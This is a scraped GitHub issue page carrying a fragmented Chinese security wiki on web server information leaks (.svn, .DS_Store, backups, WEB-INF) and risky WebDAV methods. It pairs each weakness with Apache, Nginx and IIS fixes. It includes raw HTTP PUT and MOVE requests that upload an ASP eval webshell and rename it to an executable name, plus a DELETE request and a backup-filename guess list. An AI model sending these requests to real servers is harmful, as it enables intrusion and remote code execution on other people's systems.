We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Love lives in cottages as well as in courts.
HTTP Server
SVN
SVN co
.svn
entries
.svn-base
text-base
prisitine
xxx.php.gif
webshell
none
svn export
svn co
svn export [-r 版本号] http://路径 [本地目录全路径] --username 用户名 svn export [-r 版本号] svn://路径 [本地目录全路径] --username 用户名 svn export 本地检出的(即带有.svn文件夹的)目录全路径 要导出的本地目录全路径
Apache
.htacess
<Directory ~ "\.svn"> Order allow,deny Deny from all </Directory>
Nginx
location ~ ^(.*)\/\.svn\/ { return 404; }
DS_store
.DS_store
Mac
defaults write com.apple.desktopservices DSDontWriteNetworkStores -bool TRUE
defaults delete com.apple.desktopservices DSDontWriteNetworkStores
find . -name .DS_store -exec rm -rf {} \;
Web
.rar .zip .7z .tar.gz .bak .swp .txt .html ......
www back backup web temp data 新建文件夹
Weakfilescan
WEB-INF/web.xml
web.xml
class
location ~ ^/WEB-INF/* { deny all; }
HTTP
PUT
IIS
WebDAV
MOVE
DELETE
OPTION
OPTIONS / HTTP/1.1 Host: www.xxx.com
Shell
PUT /test.txt HTTP/1.1 Host: www.xxx.com Content-Length: 23 <%eval request("a")%>
写入
txt
脚本资源访问
MOVE /test.txt HTTP/1.1 Host: www.xxx.com Destination: http://www.xxx.com/shell.asp
MOVE /test.txt HTTP/1.1 Host: www.xxx.com Destination: http://www.xxx.com/test.asp;.jpg
DELETE /test.txt HTTP/1.1 Host: www.xxx.com
DAV Explorer
scriptfile
NTFS
Everyone
读取
User
IIS管理器
属性
目录安全性
身份验证和访问控制
启用匿名访问
集成Windows身份验证
The text was updated successfully, but these errors were encountered:
No branches or pull requests
0x01 Drops Wiki
HTTP Server
SVN
导致文件泄漏SVN
导致的漏洞主要有两类SVN
为设置密码并允许匿名访问SVN co
并且未限制对服务器上的.svn
文件夹的访问SVN co
时服务器将导出一个带.svn
文件夹的目录树,.svn
文件夹中有包含了用于版本信息追踪的entries
文件,如此时未限制对服务器上的.svn
文件夹的访问便可被用于摸清站点结构SVN
产生的.svn
目录下还包含了以.svn-base
结尾的源代码文件副本(低版本SVN
具体路径为text-base
目录,高版本SVN
为prisitine
目录),如果服务器没有对此类后缀做解析,攻击者则可以直接获取文件源代码xxx.php.gif
也许就可以直接得到webshell
SVN
密码,并将匿名访问用户的权限设置none
svn export
导出,而不要使用svn co
检索,防止泄漏目录结构svn export
使用示例.svn
目录不想删掉可以在服务器上设置禁止访问此目录Apache
,设置.htacess
Nginx
, 设置配置文件location ~ ^(.*)\/\.svn\/ { return 404; }
DS_store
导致文件泄漏.DS_store
,被发现后,获取了敏感的文件名等信息.DS_store
文件,下载后查看该文件,看是否存在敏感信息Mac
系统中禁止.DS_store
生成Mac
即可生效.DS_store
生成.DS_store
文件.DS_store
文件find . -name .DS_store -exec rm -rf {} \;
Web
目录下Web
目录下.rar .zip .7z .tar.gz .bak .swp .txt .html ......
www back backup web temp data 新建文件夹
Web
目录中有备份文件存在也不一定能被猜到地址Web
目录防止其被下载Weakfilescan
WEB-INF/web.xml
泄漏Web
应用会使用多个Web
服务器搭配使用,为解决其中的一个Web
服务器的性能缺陷,会使用一些架构来做均衡负载和完成一些分层结构的安全策略等,在使用这种架构的时候,由于对静态资源的目录或文件的映射配置不当,可能会引发一些安全问题,导致web.xml
等文件能够被读取web.xml
文件,推断class
文件的路径,最后直接class
文件,再通过反编译class
文件,得到网站源码Nginx
配置禁止访问一些敏感目录location ~ ^/WEB-INF/* { deny all; }
HTTP
请求方法(PUT
)Web
服务器默认不开启PUT
等方法,出现该漏洞的原因主要是网站管理员对服务器的错误配置IIS
的服务器的WebDAV
而且没有开启权限验证,导致可以PUT
文件到服务器,再利用服务器的解析漏洞运行恶意代码,或者用WebDAV
的MOVE
方法将所上传的恶意代码的普通文件后缀修改为可执行文件后缀,运行恶意代码DELETE
方法,是可以利用其删除网站上的文件,但实际案例极少,而且开启了DELETE
方法的服务器一般也会开始PUT
方法,与PUT
方法的危害相比,DELETE
方法的危害小得多OPTION
包HTTP
响应头中带有PUT
、MOVE
等方法时则可以确定服务器开启了WebDAV
PUT
上传一个Shell
,但Shell
后缀不可以是可执行文件后缀WebDAV
扩展,并且复选了写入
, 就可以写入txt
文件脚本资源访问
,则可利用MOVE
方法将txt
后缀文件改成可执行文件的后缀脚本资源访问
,则可利用IIS
解析漏洞来执行Shell
DELETE
方法,则可使用以下HTTP
请求删除指定文件DAV Explorer
WebDAV
WebDAV
即可WebDAV
的话,加上权限验证脚本资源访问
, 则用户将具备修改WebDAV
文件夹内的脚本说明文件(scriptfile
)的功能NTFS
的权限,才可以决定用户是否有权限来访问WebDAV
文件夹内的文件WebDAV
文件夹内的NTFS
权限给予用户适当的NTFS
权限Everyone
组只有读取
权限,然后再针对个别用户给予写入
权限,例如我们给予用户User
写入的权限IIS管理器
, 然后右击WebDAV
虚拟目录,选择属性
-目录安全性
,单击身份验证和访问控制
处的编辑按钮,不选取启用匿名访问
,选择安全的验证方法, 选择集成Windows身份验证
The text was updated successfully, but these errors were encountered: